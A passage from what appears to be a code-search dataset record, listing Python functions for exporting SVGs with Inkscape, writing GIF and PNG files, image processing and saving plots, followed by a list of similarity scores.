--dpi-x=' + str(dpi * 72.0 / 96.0) +\n ' --dpi-y=' + str(dpi * 72.0 / 96.0) +\n ' --format=' + fmt +\n ' --output=\"' + outfile + '\"' +\n ' \"' + svgfile + '\"')\n else:\n return ('inkscape '\n + '--export-dpi=' + str(dpi) + ' '\n + '--export-type=' + fmt + ' '\n + '--export-filename=\"' + outfile + '\" '\n '\"' + svgfile + '\"')\n\n for line, svgfile in self.svgouts.iteritems():\n d = self.get_line_desc(line)\n outfile = self.get_output(d)\n if self.options.format == 'jpg':\n # TODO: output a jpg file\n self.options.format = 'png'\n outfile = outfile.replace('jpg', 'png')\n if self.options.format == 'svg':\n try:\n shutil.move(svgfile, outfile)\n except OSError:\n errormsg(_('Cannot create \"' + outfile + '\"'))\n else:\n cmd = get_export_cmd(svgfile,\n self.options.format,\n self.options.dpi, outfile)\n os.system(cmd)", "def draw_im(self, fname):\n im = self.get_im()\n im_agraph = nx.nx_agraph.to_agraph(im)\n im_agraph.draw(fname, prog='dot')", "def _writeGifToFile(fp, images, durations, loops):\n \n # Obtain palette for all images and count each occurance\n palettes, occur = [], []\n for im in images: \n palettes.append( getheader(im)[1] )\n for palette in palettes: \n occur.append( palettes.count( palette ) )\n \n # Select most-used palette as the global one (or first in case no max)\n globalPalette = palettes[ occur.index(max(occur)) ]\n \n # Init\n frames = 0\n firstFrame = True\n \n \n for im, palette in zip(images, palettes):\n \n if firstFrame:\n # Write header\n \n # Gather info\n header = getheaderAnim(im)\n appext = getAppExt(loops)\n \n # Write\n fp.write(header)\n fp.write(globalPalette)\n fp.write(appext)\n \n # Next frame is not the first\n firstFrame = False\n \n if True:\n # Write palette and image data\n \n # Gather info\n data = getdata(im) \n imdes, data = data[0], data[1:] \n graphext = getGraphicsControlExt(durations[frames])\n # Make image descriptor suitable for using 256 local color palette\n lid = getImageDescriptor(im) \n \n # Write local header\n if palette != globalPalette:\n # Use local color palette\n fp.write(graphext)\n fp.write(lid) # write suitable image descriptor\n fp.write(palette) # write local color table\n fp.write('\\x08') # LZW minimum size code\n else:\n # Use global color palette\n fp.write(graphext)\n fp.write(imdes) # write suitable image descriptor\n \n # Write image data\n for d in data:\n fp.write(d)\n \n # Prepare for next round\n frames = frames + 1\n \n fp.write(\";\") # end gif\n return frames", "def process_sound_map():\n pass", 
"def save_image(self):\r\n filename = filedialog.asksaveasfilename(title='Save Image As...',\r\n filetypes=((\"Portable Network Graphics (.png)\", \"*.png\"), (\"Portable Document Format(.pdf)\", \"*.pdf\")))\r\n self.graph.savefig(filename, dpi=self.graph.dpi)", "def create_svg(self, name_dict):\n s = StringIO.StringIO()\n for svg_line in open(self.options.input_file, 'r').readlines():\n # Modify the line to handle replacements from extension GUI\n svg_line = self.expand_extra_vars(svg_line, name_dict)\n # Modify the line to handle variables in svg file\n svg_line = self.expand_vars(svg_line, name_dict)\n s.write(svg_line)\n # Modify the svg to include or exclude groups\n root = etree.fromstring(s.getvalue())\n self.filter_layers(root, name_dict)\n svgout = self.get_svgout()\n try:\n f = open(svgout, 'w')\n f.write(etree.tostring(root,\n encoding='utf-8',\n xml_declaration=True))\n except IOError:\n errormsg(_('Cannot open \"' + svgout + '\" for writing'))\n finally:\n f.close()\n s.close()\n return svgout", "def process(out, args):\n\n # Convert options to chunks in the args.chunk list\n if args.gamma:\n v = int(round(1e5 * args.gamma))\n bs = io.BytesIO(struct.pack(\">I\", v))\n args.chunk.insert(0, Chunk(b\"gAMA\", bs))\n if args.sigbit:\n v = struct.pack(\"%dB\" % len(args.sigbit), *args.sigbit)\n bs = io.BytesIO(v)\n args.chunk.insert(0, Chunk(b\"sBIT\", bs))\n if args.iccprofile:\n # http://www.w3.org/TR/PNG/#11iCCP\n v = b\"a color profile\\x00\\x00\" + zlib.compress(args.iccprofile.read())\n bs = io.BytesIO(v)\n args.chunk.insert(0, Chunk(b\"iCCP\", bs))\n if args.transparent:\n # https://www.w3.org/TR/2003/REC-PNG-20031110/#11tRNS\n v = struct.pack(\">%dH\" % len(args.transparent), *args.transparent)\n bs = io.BytesIO(v)\n args.chunk.insert(0, Chunk(b\"tRNS\", bs))\n if args.background:\n # https://www.w3.org/TR/2003/REC-PNG-20031110/#11bKGD\n v = struct.pack(\">%dH\" % len(args.background), *args.background)\n bs = io.BytesIO(v)\n args.chunk.insert(0, Chunk(b\"bKGD\", bs))\n\n # Create:\n # - a set of chunks to delete\n # - a dict of chunks to replace\n # - a list of chunk to add\n\n delete = set(args.delete)\n # Generally, there should be at most one of the 'replacing' chunks.\n replacing = set([b\"gAMA\", b\"sBIT\", b\"PLTE\", b\"tRNS\", b\"sPLT\", b\"IHDR\"])\n replace = dict()\n add = []\n\n for chunk in args.chunk:\n if chunk.type in replacing:\n replace[chunk.type] = chunk\n else:\n add.append(chunk)\n\n input = png.Reader(file=args.input)\n\n return png.write_chunks(out, edit_chunks(input.chunks(), delete, replace, add))", "def add_processed_image(image_proc_type, name, b64_string, export_file_type):\n\n if image_proc_type == \"contrast stretching\":\n info = process_contrast_stretch(name, b64_string, export_file_type)\n metrics_list = list(info[4])\n num_pixels = metrics_list[0]\n x_coord = metrics_list[1]\n y_coord = metrics_list[2]\n avg_value = metrics_list[3]\n metrics_output = [num_pixels, x_coord, y_coord, avg_value]\n info[6] = info[6].decode(\"utf-8\")\n add_file(info[0], info[1], info[2], info[3], metrics_output, info[6])\n logging.info('Image processed with contrast stretching')\n\n if image_proc_type == \"adaptive equalization\":\n info = process_adapt_equalization(name, b64_string, export_file_type)\n metrics_list = list(info[4])\n num_pixels = metrics_list[0]\n x_coord = metrics_list[1]\n y_coord = metrics_list[2]\n avg_value = metrics_list[3]\n metrics_output = [num_pixels, x_coord, y_coord, avg_value]\n info[6] = info[6].decode(\"utf-8\")\n 
add_file(info[0], info[1], info[2], info[3], metrics_output, info[6])\n logging.info('Image processed with adaptive equalization')\n\n if image_proc_type == \"histogram equalization\":\n info = process_histogram_equalization(name, b64_string, export_file_type)\n metrics_list = list(info[4])\n num_pixels = metrics_list[0]\n x_coord = metrics_list[1]\n y_coord = metrics_list[2]\n avg_value = metrics_list[3]\n metrics_output = [num_pixels, x_coord, y_coord, avg_value]\n info[6] = info[6].decode(\"utf-8\")\n add_file(info[0], info[1], info[2], info[3], metrics_output, info[6])\n logging.info('Image processed with histogram equalization')\n\n if image_proc_type == \"reverse video\":\n info = process_reverse_image(name, b64_string, export_file_type)\n metrics_list = list(info[4])\n num_pixels = metrics_list[0]\n x_coord = metrics_list[1]\n y_coord = metrics_list[2]\n avg_value = metrics_list[3]\n metrics_output = [num_pixels, x_coord, y_coord, avg_value]\n info[6] = info[6].decode(\"utf-8\")\n add_file(info[0], info[1], info[2], info[3], metrics_output, info[6])\n logging.info('Image processed with reverse image')\n\n if image_proc_type == \"log compression\":\n info = process_log_compression(name, b64_string, export_file_type)\n metrics_list = list(info[4])\n num_pixels = metrics_list[0]\n x_coord = metrics_list[1]\n y_coord = metrics_list[2]\n avg_value = metrics_list[3]\n metrics_output = [num_pixels, x_coord, y_coord, avg_value]\n info[6] = info[6].decode(\"utf-8\")\n add_file(info[0], info[1], info[2], info[3], metrics_output, info[6])\n logging.info('Image processed with log compression')\n\n return jsonify(\"it worked\")", "def add_pixel_fn(filename: str, resample_name: str) -> None:\n\n header = \"\"\" <VRTRasterBand dataType=\"Byte\" band=\"1\" subClass=\"VRTDerivedRasterBand\">\"\"\"\n contents = \"\"\"\n <PixelFunctionType>{0}</PixelFunctionType>\n <PixelFunctionLanguage>Python</PixelFunctionLanguage>\n <PixelFunctionCode><![CDATA[{1}]]>\n </PixelFunctionCode>\"\"\"\n\n lines = open(filename, 'r').readlines()\n lines[3] = header # FIX ME: 3 is a hand constant\n lines.insert(4, contents.format(resample_name,\n get_resample(resample_name)))\n open(filename, 'w').write(\"\".join(lines))", "def save_image(self, image_file):\r\n self.ensure_pyplot()\r\n command = 'plt.gcf().savefig(\"%s\")'%image_file\r\n #print 'SAVEFIG', command # dbg\r\n self.process_input_line('bookmark ipy_thisdir', store_history=False)\r\n self.process_input_line('cd -b ipy_savedir', store_history=False)\r\n self.process_input_line(command, store_history=False)\r\n self.process_input_line('cd -b ipy_thisdir', store_history=False)\r\n self.process_input_line('bookmark -d ipy_thisdir', store_history=False)\r\n self.clear_cout()", "def save(file_name):\n setup()\n plt.savefig(file_name)", "def __main__() :\n try :\n poly = Polyhedre(sys.argv[1])\n \n name = sys.argv[2]\n \n createAllFiles(poly, name)\n\n createAllImageFiles(poly, name)\n \n except FileNotFoundError :\n print(\"Use an existing file\")", "def TextureFiles():\n import shutil\n\n # first convert the .psd files to .png\n\n FbmDir = glo.outputFolder + '.fbm'\n\n for d1, d2, filenames in os.walk(FbmDir):\n for filename in filenames:\n \"\"\"filename: vitrin_diffuse.psd\n \"\"\"\n # print \"TextureFiles():\", filename\n if filename[-4:].upper() == '.PSD':\n #print \" -- FbmDir:\" , FbmDir\n #print \" -- in the if clause with filename:\" , filename\n #print \" -- glo.outputFolder\" , glo.outputFolder\n # FbmDir = '../fbx/simplelifeembedmedia.fbm'\n # filename = 
'shelves_light.PSD'\n PsdToPngConverter(FbmDir, filename)\n\n # Move only the .png file to the ../png/ directory\n filename = filename[:-4] + '.png'\n src = os.path.join(FbmDir, filename)\n elif filename[0] != '.':\n src = os.path.join(FbmDir, filename)\n pass\n\n shutil.copy(src, glo.outputFolder)\n print os.path.join(glo.outputFolder, filename), \"\\n\"\n sys.stdout.flush()\n # for d1, d2, files in os.walk(glo.outputFolder):\n # if not filename in files:\n # #print \"moving: \", files, filename, not filename in files\n # shutil.copy(src, glo.outputFolder)\n # print os.path.join(glo.outputFolder, filename), \"\\n\"\n # else:\n # print \"%s/%s already exists. File not moved\" % (glo.outputFolder,filename)", "def make_label_data(self):\n from xml.etree.ElementTree import Element, SubElement, dump, ElementTree, parse\n\n if not self.graphicsView.hasImage():\n self.showImageSelectionMessageBox()\n return\n\n app_doc_data = AppDocData.instance()\n project = app_doc_data.getCurrentProject()\n\n smalls = []\n bigs = []\n\n symbol_list = app_doc_data.getTargetSymbolList(all=True)\n for symbol in symbol_list:\n if symbol.width and symbol.height:\n if symbol.width > 300 or symbol.height > 300:\n bigs.append(symbol.getName())\n else:\n smalls.append(symbol.getName())\n\n symbols = [item for item in self.graphicsView.scene().items() if issubclass(type(item), SymbolSvgItem)]\n names = [smalls, bigs]\n\n img = app_doc_data.activeDrawing.image_origin\n\n small_size = 500\n big_size = 850\n\n save_path = project.getTrainingSymbolFilePath()\n\n index = 0\n for size in [small_size, big_size]:\n offsets = [0, int(size / 2)]\n\n width, height = img.shape[1], img.shape[0]\n width_count, height_count = width // size + 2, height // size + 2\n b_width, b_height = width_count * size, height_count * size\n b_img = np.zeros((b_height, b_width), np.uint8) + 255\n b_img[:height, :width] = img[:, :]\n\n for offset in offsets:\n for row in range(height_count):\n for col in range(width_count):\n x, y = col * size + offset, row * size + offset\n tile_rect = QRectF(x, y, size, size)\n tile_symbols = []\n for symbol in [symbol for symbol in symbols if symbol.name in names[index]]:\n if tile_rect.contains(symbol.sceneBoundingRect()):\n tile_symbols.append(symbol)\n symbols.remove(symbol)\n\n if tile_symbols:\n training_uid = str(uuid.uuid4())\n training_image_path = os.path.join(save_path, training_uid + '.png')\n training_xml_path = os.path.join(save_path, training_uid + '.xml')\n\n # save image\n #_img = b_img[round(tile_rect.top()):round(tile_rect.bottom()),\n # round(tile_rect.left()):round(tile_rect.right())]\n #cv2.imwrite(training_image_path, _img)\n _img = self.graphicsView.image().copy(round(tile_rect.left()), round(tile_rect.top()), round(tile_rect.width()), round(tile_rect.height()))\n _img.save(training_image_path)\n\n # save label\n xml = Element('annotation')\n SubElement(xml, 'folder').text = 'None'\n SubElement(xml, 'filename').text = os.path.basename(save_path)\n\n pathNode = Element('path')\n pathNode.text = save_path.replace('/', '\\\\')\n xml.append(pathNode)\n\n sourceNode = Element('source')\n databaseNode = Element('database')\n databaseNode.text = 'Unknown'\n sourceNode.append(databaseNode)\n xml.append(sourceNode)\n\n sizeNode = Element('size')\n widthNode = Element('width')\n widthNode.text = str(int(tile_rect.width()))\n sizeNode.append(widthNode)\n heightNode = Element('height')\n heightNode.text = str(int(tile_rect.height()))\n sizeNode.append(heightNode)\n depthNode = Element('depth')\n 
depthNode.text = '3'\n sizeNode.append(depthNode)\n xml.append(sizeNode)\n\n segmentedNode = Element('segmented')\n segmentedNode.text = '0'\n xml.append(segmentedNode)\n\n labelContent = []\n counts = {}\n for item in tile_symbols:\n rect = item.sceneBoundingRect()\n label, xMin, yMin, xMax, yMax = item.name, int(rect.x() - 5 - x), int(rect.y() - 5 - y), int(rect.x() + rect.width() + 5 - x), int(rect.y() + rect.height() + 5 - y)\n xMin = xMin if xMin > 0 else 0\n yMin = yMin if yMin > 0 else 0\n xMax = xMax if xMax < size else size\n yMax = yMax if yMax < size else size\n\n if label == 'None' or label == '':\n continue\n if label not in labelContent:\n labelContent.append(label)\n counts[label] = 1\n else:\n counts[label] = counts[label] + 1\n\n objectNode = Element('object')\n nameNode = Element('name')\n nameNode.text = label\n objectNode.append(nameNode)\n poseNode = Element('pose')\n poseNode.text = 'Unspecified'\n objectNode.append(poseNode)\n truncatedNode = Element('truncated')\n truncatedNode.text = '0'\n objectNode.append(truncatedNode)\n difficultNode = Element('difficult')\n difficultNode.text = '0'\n objectNode.append(difficultNode)\n\n bndboxNode = Element('bndbox')\n xminNode = Element('xmin')\n xminNode.text = str(xMin)\n bndboxNode.append(xminNode)\n yminNode = Element('ymin')\n yminNode.text = str(yMin)\n bndboxNode.append(yminNode)\n xmaxNode = Element('xmax')\n xmaxNode.text = str(xMax)\n bndboxNode.append(xmaxNode)\n ymaxNode = Element('ymax')\n ymaxNode.text = str(yMax)\n bndboxNode.append(ymaxNode)\n objectNode.append(bndboxNode)\n\n xml.append(objectNode)\n\n ElementTree(xml).write(training_xml_path)\n\n index += 1\n\n QMessageBox.about(self, self.tr(\"Notice\"), self.tr('Successfully applied. '))", "def main(filename):\n\n if not filename.endswith(SOURCE_TYPE):\n print(\"invalid file type, should be *\" + SOURCE_TYPE)\n return ERROR_FILE_TYPE\n\n commands = parse(filename, SymbolDict())\n\n if not commands:\n print(\"invalid asm syntax\")\n return ERROR_FILE_SYNTAX\n\n translate(commands, filename[:-len(SOURCE_TYPE)] + DEST_TYPE)\n\n return SUCCESS" ]
[ "0.5763709", "0.55842566", "0.5484444", "0.54430854", "0.5442242", "0.5435863", "0.53775424", "0.53518033", "0.53421825", "0.53008115", "0.52987564", "0.5291246", "0.5290452", "0.5279297", "0.52617425", "0.5226984", "0.5217233", "0.52096176", "0.51862746", "0.51822567", "0.51762855", "0.51399404", "0.512233", "0.5105043", "0.5100154", "0.50914484", "0.5087448", "0.50743026", "0.50676775", "0.506356", "0.5051232", "0.505046", "0.5044476", "0.5043442", "0.50318784", "0.50144655", "0.50098354", "0.50087297", "0.49924317", "0.49839854", "0.49829292", "0.49819046", "0.49814355", "0.49709675", "0.49689192", "0.4961625", "0.49533483", "0.49510556", "0.4935267", "0.49301493", "0.4925548", "0.492379", "0.49221352", "0.49176916", "0.49163833", "0.49138233", "0.49135885", "0.4913016", "0.491049", "0.49066004", "0.4899285", "0.48956877", "0.48928183", "0.48911667", "0.48846364", "0.4877936", "0.48757643", "0.48750687", "0.4872887", "0.48713982", "0.48649418", "0.48528227", "0.48516864", "0.48470598", "0.48463944", "0.48286214", "0.48281667", "0.4819295", "0.4819054", "0.4819049", "0.48181605", "0.48164743", "0.47999367", "0.47922197", "0.47918418", "0.47848234", "0.47727993", "0.47685167", "0.47660482", "0.4762805", "0.47618344", "0.4759364", "0.4755407", "0.47541025", "0.47528422", "0.47522935", "0.47483298", "0.47456068", "0.47446465", "0.47431377" ]
0.61083233
0
calculate_angles(chunk) calculates elevation and azimuth given a JSON-formatted chunk from ODAS
def calculate_angles(self, chunk):
    import math
    import collections
    Angles = collections.namedtuple("Angles", "ev az")
    x = float(chunk['x'])
    y = float(chunk['y'])
    z = float(chunk['z'])
    ev = round(90 - math.acos(z/math.sqrt(x*x+y*y+z*z))*180/math.pi)
    az = round(math.atan2(y,x)*180/math.pi)
    return Angles(ev, az)
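The conversion above is the standard Cartesian-to-spherical mapping: elevation is 90 degrees minus the polar angle acos(z/r), and azimuth is atan2(y, x) in the horizontal plane. A minimal standalone sketch of the same math follows; the chunk keys 'x', 'y', 'z' mirror the document's function, and the sample values are made up for illustration, not taken from real ODAS output:

import math
import collections

Angles = collections.namedtuple("Angles", "ev az")

def calculate_angles(chunk):
    # Direction vector components from the ODAS JSON chunk.
    x, y, z = float(chunk['x']), float(chunk['y']), float(chunk['z'])
    r = math.sqrt(x*x + y*y + z*z)
    # Elevation: 90 deg minus the polar angle measured from the +z axis.
    ev = round(90 - math.degrees(math.acos(z / r)))
    # Azimuth: angle of (x, y) in the horizontal plane, in (-180, 180].
    az = round(math.degrees(math.atan2(y, x)))
    return Angles(ev, az)

# Hypothetical chunk: a source directly along +y at the horizon.
print(calculate_angles({'x': 0.0, 'y': 1.0, 'z': 0.0}))  # Angles(ev=0, az=90)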
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parse(all_blobs, all_angles):", "def extract_angles(self):\n atom_ids = self.contents['ID']\n angle_list = []\n for key, value in self.angles.items():\n a = value[0]\n b = value[1]\n c = value[2]\n\n lst = [a, b, c]\n\n A_ = np.asarray(atom_ids).reshape(-1, 3)\n\n sorted = np.argsort(lst)\n A_sorted = A_[:, sorted]\n\n idd = np.ones(len(A_sorted)) * key\n iff = np.arange(1, len(A_sorted) + 1)\n\n concate = np.concatenate((iff[:,np.newaxis], idd[:,np.newaxis], A_sorted), axis=-1)\n df = pd.DataFrame(data=concate, columns=['Mol_ID', 'Angle_type', 'Atom_1', 'Atom_2', 'Atom_3'])\n angle_list.append(df)\n self.angle_df = pd.concat(angle_list)\n self.num_angles = len(self.angle_df)", "def get_mean_viewing_angles(self) -> (float, float, float):\n # Get MTD XML file\n root, _ = self.read_mtd()\n\n # Open zenith and azimuth angle\n try:\n az = float(root.findtext(\".//SatelliteAzimuth\"))\n off_nadir = float(root.findtext(\".//ViewAngle\"))\n incidence_angle = float(root.findtext(\".//incidenceAngle\"))\n except TypeError:\n raise InvalidProductError(\n \"SatelliteAzimuth, ViewAngle or incidenceAngle not found in metadata!\"\n )\n\n return az, off_nadir, incidence_angle", "def calculate_angles(self, x, y):\n Oimat = inv(self.Omat)\n Mat = self.pixel_size * inv(self.Dmat) * Oimat\n polar_angles = []\n azimuthal_angles = []\n for i in range(len(x)):\n peak = Oimat * (vec(x[i], y[i]) - self.Cvec)\n v = norm(Mat * peak)\n polar_angle = np.arctan(v / self.distance)\n polar_angles.append(polar_angle)\n azimuthal_angles.append(np.arctan2(-peak[1, 0], peak[2, 0]))\n return (np.array(polar_angles) * degrees,\n np.array(azimuthal_angles) * degrees)", "def test_calcAngles_angles_or_axis(self, kargs, expected_len_result, expected_truncated_results):\n kargs['vsk'] = self.cal_SM\n result = pycgmCalc.calcAngles(self.motion_data, **kargs)\n np.testing.assert_equal(len(result), expected_len_result)\n np.testing.assert_almost_equal(result[0:5], expected_truncated_results)", "def __prepare_angles_contents(angles: Optional[dict],\n elements: list) -> list:\n\n angles_contents = []\n\n number_of_angles = len(angles) if angles is not None else 0\n\n angles_contents.append(\n ' {:^2}'.format(number_of_angles) +\n ' ! 
Nr of angles;' +\n 'at1;at2;at3;Thetao,o;ka;kb;pv1;pv2;val(bo)\\n')\n\n if number_of_angles:\n\n for key, values in angles.items():\n\n num = ReactiveForceFieldWriter.__get_num_from_str(elements,\n key)\n\n angles_contents.append(\n ' ' + num + ' ' * 2 +\n str(values['value']).lstrip('[').rstrip(']') +\n '\\n')\n\n return angles_contents", "def angle(z):", "def ADCangles(EL, HA, DEC, LAT=31.963972222):\n Z, HA, coDEC, coLAT = np.deg2rad([90 - EL, HA, 90 - DEC, 90 - LAT])\n if Z == 0:\n return np.zeros(3)\n sinZ = np.sin(Z)\n sinP = np.sin(HA) * np.sin(coLAT) / sinZ\n cosP = (np.cos(coLAT) - np.cos(coDEC) * np.cos(Z)) / (np.sin(coDEC) * sinZ)\n P = np.arctan2(sinP, cosP)\n # Formulas from DESI-4957\n tanZ = np.tan(Z)\n HORIZON = P + 0.5 * np.pi\n ADC1 = HORIZON + (0.0353 + tanZ * (0.2620 + tanZ * 0.3563))\n ADC2 = HORIZON - (0.0404 + tanZ * (0.2565 + tanZ * 0.3576))\n return np.rad2deg([P, ADC1, ADC2])", "def get_mean_sun_angles(self) -> (float, float):\n # Get MTD XML file\n root, _ = self.read_mtd()\n\n # Open zenith and azimuth angle\n zenith_angle = float(root.findtext(\".//SolarZenith\"))\n azimuth_angle = float(root.findtext(\".//SolarAzimuth\"))\n\n return azimuth_angle, zenith_angle", "def check_angle(self):\n self.find_pixels()\n alpha_theta=np.deg2rad(70)\n alpha_phi=np.deg2rad(70)\n extreme_values=self.compute_extreme_values(alpha_phi, alpha_theta)\n x=np.linspace(extreme_values[0], extreme_values[1], self.number_of_pix[1])\n y=np.linspace(extreme_values[2], extreme_values[3], self.number_of_pix[0])\n phi_0=20\n phi_0=np.deg2rad(phi_0)\n j, diff=self.compute_phi(\"find_orient.png\")\n print \"j=\", j\n print \"diff=\", diff", "def calculate_angles():\n time = request.args.get('time')\n\n result = Helpers.validate_and_parse_input(time)\n if result:\n hour, minute = result\n\n hour_angle = 0.5 * (hour * 60 + minute)\n minute_angle = 6 * minute\n\n angle = abs(hour_angle - minute_angle)\n angle = min(360 - angle, angle)\n DatastoreClient(kind='clock_angle_logs').log_to_datastore(time, angle)\n\n return Helpers.success(angle)\n else:\n DatastoreClient(kind='clock_angle_logs').log_to_datastore(time, 'bad_request')\n return Helpers.bad_request(r\"query parameter time should follow regex ^\\d{1,2}:\\d{1,2}$ and value should be \"\n r\"between 00:00 and 23:59\")", "def areas(self):\n\n height_delta = (np.cos(self.polar_corners[:-1, :-1]) - np.cos(self.polar_corners[:-1, 1:]))\n azimuth_delta = (self.azimuthal_corners[1:, 1:] - self.azimuthal_corners[:-1, 1:])\n\n return height_delta * azimuth_delta", "def calculate_average_angles(tube_steps,angular_file,pixel_step,tube_sep,extra_dummy=[]):\n no_of_overlaps = int(round((len(tube_steps)+len(extra_dummy))/pixel_step))-1\n correction_array = Array(read_horizontal_corrections(angular_file))\n no_of_tubes = len(correction_array)\n counter = array.zeros(no_of_tubes+no_of_overlaps,int)\n final_values = array.zeros(no_of_tubes+no_of_overlaps,float)\n for stepno in range(no_of_overlaps+1):\n counter[stepno:stepno+no_of_tubes]+=array.ones(no_of_tubes,int)\n final_values[stepno:stepno+no_of_tubes]+=correction_array\n ave_angles = final_values/counter\n print 'Check: average angles ' + `ave_angles`\n print 'Check: counter' + `counter`\n print 'Check: no of overlaps, tubes: %d %d ' % (no_of_overlaps,no_of_tubes)\n # Now apply these average corrections to the actual angles\n real_step = pixel_step\n if len(tube_steps)<pixel_step:\n real_step = len(tube_steps) #for when we have no overlap and missing steps\n final_values = 
array.zeros((no_of_tubes+no_of_overlaps)*real_step)\n print 'Final values has len %d' % len(final_values)\n for stepno in range(no_of_tubes+no_of_overlaps):\n final_values[stepno*real_step:(stepno+1)*real_step] = tube_steps + tube_sep*stepno + ave_angles[stepno]\n return final_values", "def create_azimuthal_polarization(dim, rotation):\n theta_array = np.zeros((dim, dim))\n\n for i in range(np.size(theta_array, 0)):\n for j in range(np.size(theta_array, 1)):\n x = -dim / 2 + i\n y = -dim / 2 + j\n # perform roation\n th = math.pi*rotation/180.0\n x = np.cos(th)*x - np.sin(th)*y\n y = np.sin(th)*x + np.cos(th)*y\n\n rot = math.atan2(x, y) + math.pi/2\n # factor = (rot % (2*math.pi))\n theta_array[i][j] = (rot % (2 * math.pi))\n return theta_array", "def write_angles(self, polar_angles, azimuthal_angles):\n with self.entry.nxfile:\n if 'sample' not in self.entry:\n self.entry['sample'] = NXsample()\n if 'peaks' not in self.entry:\n self.entry['peaks'] = NXdata()\n else:\n if 'polar_angle' in self.entry['peaks']:\n del self.entry['peaks/polar_angle']\n if 'azimuthal_angle' in self.entry['peaks']:\n del self.entry['peaks/azimuthal_angle']\n self.write_parameter('peaks/polar_angle', polar_angles)\n self.write_parameter('peaks/azimuthal_angle', azimuthal_angles)", "def azimuth(poly):\n num = len(poly) - 1\n vec = unit_normal(poly[0], poly[1], poly[num])\n vec_azi = np.array([vec[0], vec[1], 0])\n vec_n = np.array([0, 1, 0])\n # update by Santosh\n # angle2vecs gives the smallest angle between the vectors\n # so for a west wall angle2vecs will give 90\n # the following 'if' statement will make sure 270 is returned\n x_vector = vec_azi[0]\n if x_vector < 0:\n return 360 - angle2vecs(vec_azi, vec_n)\n else:\n return angle2vecs(vec_azi, vec_n)", "def angles(self):\n self._sort_measurements()\n return self._angles", "def _parse_json(joint_states):\n json_f = [J for J in os.listdir(joint_states) if J.endswith('.json')]\n dfs = []\n for j in json_f:\n js = pd.read_json(f'{joint_states}/{j}')\n dfs.append(np.array([A['angle'] for A in js[js.columns[0]][0]['joint_angles']], dtype=float))\n return np.array(dfs)[:, :5]", "def really_process(txn, ctx):\n delete_prev_attrs(txn, ctx[\"nexrad\"])\n\n cenlat = float(ST[ctx[\"nexrad\"]][\"lat\"])\n cenlon = float(ST[ctx[\"nexrad\"]][\"lon\"])\n latscale = 111137.0\n lonscale = 111137.0 * math.cos(cenlat * math.pi / 180.0)\n\n # STM ID AZ/RAN TVS MESO POSH/POH/MX SIZE VIL DBZM HT TOP FCST MVMT\n co = 0\n for line in ctx[\"lines\"]:\n if len(line) < 5:\n continue\n if line[1] != \" \":\n continue\n tokens = line.replace(\">\", \" \").replace(\"/\", \" \").split()\n if not tokens or tokens[0] == \"STM\":\n continue\n if tokens[5] == \"UNKNOWN\":\n tokens[5] = 0\n tokens.insert(5, 0)\n tokens.insert(5, 0)\n if len(tokens) < 13:\n LOG.info(\"Incomplete Line ||%s||\", line)\n continue\n d = {}\n co += 1\n d[\"storm_id\"] = tokens[0]\n d[\"azimuth\"] = float(tokens[1])\n if tokens[2] == \"***\":\n LOG.info(\"skipping bad line |%s|\", line)\n continue\n d[\"range\"] = float(tokens[2]) * 1.852\n d[\"tvs\"] = tokens[3]\n d[\"meso\"] = tokens[4]\n d[\"posh\"] = tokens[5] if tokens[5] != \"***\" else None\n d[\"poh\"] = tokens[6] if tokens[6] != \"***\" else None\n if tokens[7] == \"<0.50\":\n tokens[7] = 0.01\n d[\"max_size\"] = tokens[7]\n\n if tokens[8] in [\"UNKNOWN\", \"***\"]:\n d[\"vil\"] = 0\n else:\n d[\"vil\"] = tokens[8]\n\n d[\"max_dbz\"] = tokens[9]\n d[\"max_dbz_height\"] = tokens[10]\n d[\"top\"] = tokens[11]\n if tokens[12] == \"NEW\":\n d[\"drct\"] = 0\n 
d[\"sknt\"] = 0\n else:\n d[\"drct\"] = int(float(tokens[12]))\n d[\"sknt\"] = tokens[13]\n d[\"nexrad\"] = ctx[\"nexrad\"]\n\n cosaz = math.cos(d[\"azimuth\"] * math.pi / 180.0)\n sinaz = math.sin(d[\"azimuth\"] * math.pi / 180.0)\n mylat = cenlat + (cosaz * (d[\"range\"] * 1000.0) / latscale)\n mylon = cenlon + (sinaz * (d[\"range\"] * 1000.0) / lonscale)\n d[\"geom\"] = \"SRID=4326;POINT(%s %s)\" % (mylon, mylat)\n d[\"valid\"] = ctx[\"ts\"]\n\n for table in [\n \"nexrad_attributes\",\n \"nexrad_attributes_%s\" % (ctx[\"ts\"].year,),\n ]:\n sql = f\"\"\"\n INSERT into {table} (nexrad, storm_id, geom, azimuth,\n range, tvs, meso, posh, poh, max_size, vil, max_dbz,\n max_dbz_height, top, drct, sknt, valid)\n values (%(nexrad)s, %(storm_id)s, ST_GeomFromEWKT(%(geom)s),\n %(azimuth)s, %(range)s, %(tvs)s, %(meso)s, %(posh)s,\n %(poh)s, %(max_size)s, %(vil)s, %(max_dbz)s,\n %(max_dbz_height)s, %(top)s, %(drct)s, %(sknt)s, %(valid)s)\n \"\"\"\n if common.dbwrite_enabled():\n txn.execute(sql, d)\n\n if co > 0:\n LOG.info(\n \"%s %s Processed %s entries\",\n ctx[\"nexrad\"],\n ctx[\"ts\"].strftime(\"%Y-%m-%d %H:%M UTC\"),\n co,\n )\n return co", "def test_calcAngles_angles_and_axis(self, kargs, expected_len_result, expected_first_angle, expected_first_axis):\n kargs['vsk'] = self.cal_SM\n angles, axis = pycgmCalc.calcAngles(self.motion_data, **kargs)\n np.testing.assert_equal(len(angles), expected_len_result)\n np.testing.assert_equal(len(axis), expected_len_result)\n np.testing.assert_almost_equal(angles[0][0], expected_first_angle, self.rounding_precision)\n np.testing.assert_almost_equal(axis[0][0], expected_first_axis, self.rounding_precision)", "def sensor_angles(self, channel=\"1\"):\n if channel != \"3B\":\n sensor = self.channel2sensor[channel]\n else:\n sensor = \"VNIRB\"\n\n # Angular data from ASTER metadata data.\n S = float(self.meta[\"MAPORIENTATIONANGLE\"])\n\n FOV = {\"VNIR\": 6.09, \"VNIRB\": 5.19, \"SWIR\": 4.9, \"TIR\": 4.9}\n\n P = {\n \"VNIR\": float(self.meta[\"POINTINGANGLE.1\"]),\n \"VNIRB\": float(self.meta[\"POINTINGANGLE.1\"]),\n \"SWIR\": float(self.meta[\"POINTINGANGLE.2\"]),\n \"TIR\": float(self.meta[\"POINTINGANGLE.3\"]),\n }\n\n # cut overlap area of backward pointing telescope\n if channel != \"3B\":\n field = self.read_digitalnumbers(channel)\n elif channel == \"3B\" and self.meta[\"FLYINGDIRECTION\"] == \"DE\":\n field = self.read_digitalnumbers(channel)[400:]\n elif channel == \"3B\" and 